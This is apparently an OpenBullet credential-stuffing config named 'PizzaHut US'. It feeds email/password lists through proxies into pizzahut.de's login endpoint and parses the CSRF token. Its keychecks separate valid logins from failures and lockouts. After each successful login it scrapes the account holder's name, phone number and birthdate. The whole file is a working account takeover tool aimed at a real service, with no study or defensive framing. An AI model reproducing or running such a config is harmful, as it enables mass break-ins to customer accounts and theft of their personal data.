[SETTINGS]
{
  "Name": "PizzaHut US",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2019-06-17T05:38:37.745287+02:00",
  "AdditionalInfo": "",
  "Author": "xKeksbyte",
  "Version": "1.2.8 Modded",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [
    {
      "SliceName": "",
      "RuleType": 0,
      "RuleString": "Lowercase",
      "Id": 1888791391
    },
    {
      "SliceName": "",
      "RuleType": 0,
      "RuleString": "Uppercase",
      "Id": 914246243
    },
    {
      "SliceName": "",
      "RuleType": 0,
      "RuleString": "Digit",
      "Id": 1239931207
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#First_Request REQUEST GET "https://pizzahut.de" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Change_to_English REQUEST GET "https://pizzahut.de/auth/login?language=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"CSRFToken\" value=\"" "\" />" -> VAR "Token" 

#AjaxLogin REQUEST POST "https://pizzahut.de/auth/ajax-login" 
  CONTENT "j_username=<USER>&j_password=<PASS>&_spring_security_remember_me=on&CSRFToken=<Token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
    KEY "\"loggedIn\":false" 
    KEY "\"username\":null" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Invalid username or password" 
  KEYCHAIN Ban OR 
    KEY "Account was locked." 
    KEY "or change password." 
    KEY "Not Found" 
    KEY "The requested URL /auth/index was not found on this server." 
    KEY "Web Server's Default Page" 
    KEY "This page was generated by Plesk." 
    KEY "Proxy Authorization Required" 
    KEY "Authorization is required for access to this proxy " 
    KEY "Access Denined" 
    KEY "The maximum web proxy user limit has been reached." 

#Check_Auth REQUEST GET "https://pizzahut.de/auth/index?language=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "https://pizzahut.de/auth/index?language=en" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "https://pizzahut.de/auth/index?language=en" 
  KEYCHAIN Ban OR 
    KEY "Not Found" 
    KEY "The requested URL /auth/index was not found on this server." 
    KEY "Web Server's Default Page" 
    KEY "This page was generated by Plesk." 
    KEY "or change password." 
    KEY "Account was locked." 
    KEY "Proxy Authorization Required" 
    KEY "Authorization is required for access to this proxy " 
    KEY "Access Denined" 
    KEY "The maximum web proxy user limit has been reached." 

PARSE "<SOURCE>" LR "name=\"firstName\" class=\"text-only-no-whitespace ph-user-forename js-change-user-personal-data\" aria-required=\"true\" value=\"" "\" />" -> CAP "First Name" 

PARSE "<SOURCE>" LR "name=\"lastName\" class=\"text-only-no-whitespace ph-user-surname js-change-user-personal-data\" value=\"" "\" />" -> CAP "Last Name" 

PARSE "<SOURCE>" LR "name=\"phoneNo\" class=\"num-only js-change-user-personal-data\" aria-required=\"true\" value=\"" "\" />" -> CAP "Phone number" 

PARSE "<SOURCE>" LR "name=\"birthDate\" class=\"ph-user-birthdate birthdate-picker js-change-user-personal-data\" value=\"" "\" />" -> CAP "Birthdate" 

